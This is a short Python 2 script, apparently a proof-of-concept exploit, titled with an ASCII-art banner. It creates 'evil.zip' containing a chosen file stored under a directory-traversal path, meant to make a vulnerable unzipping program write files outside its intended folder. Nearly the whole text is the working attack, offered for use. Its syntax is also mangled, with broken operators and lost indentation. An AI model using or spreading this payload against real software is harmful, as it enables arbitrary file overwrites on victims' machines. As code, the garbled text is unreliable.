banner = ""
banner + = " ___ __ ____ _ _ \n"
banner + = " |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | | \n"
banner + = " | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | | \n"
banner + = " | || | | | _| (_) | |_| | __/ | | | / ___ \| |___ \n"
banner + = " |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|\n\n"
print banner
import zipfile, sys
if ( len (sys.argv) ! = 2 ):
print "[+] Usage : python exploit.py file_to_do_the_traversal [+]"
print "[+] Example: python exploit.py test.txt"
exit( 0 )
print "[+] Creating Zip File [+]"
zf = zipfile.ZipFile( "evil.zip" , "w" )
zf.write(sys.argv[ 1 ], "..\\..\\..\\..\\..\\..\\..\\..\\POC.txt" )
zf.close()
print "[+] Created evil.zip successfully [+]"
|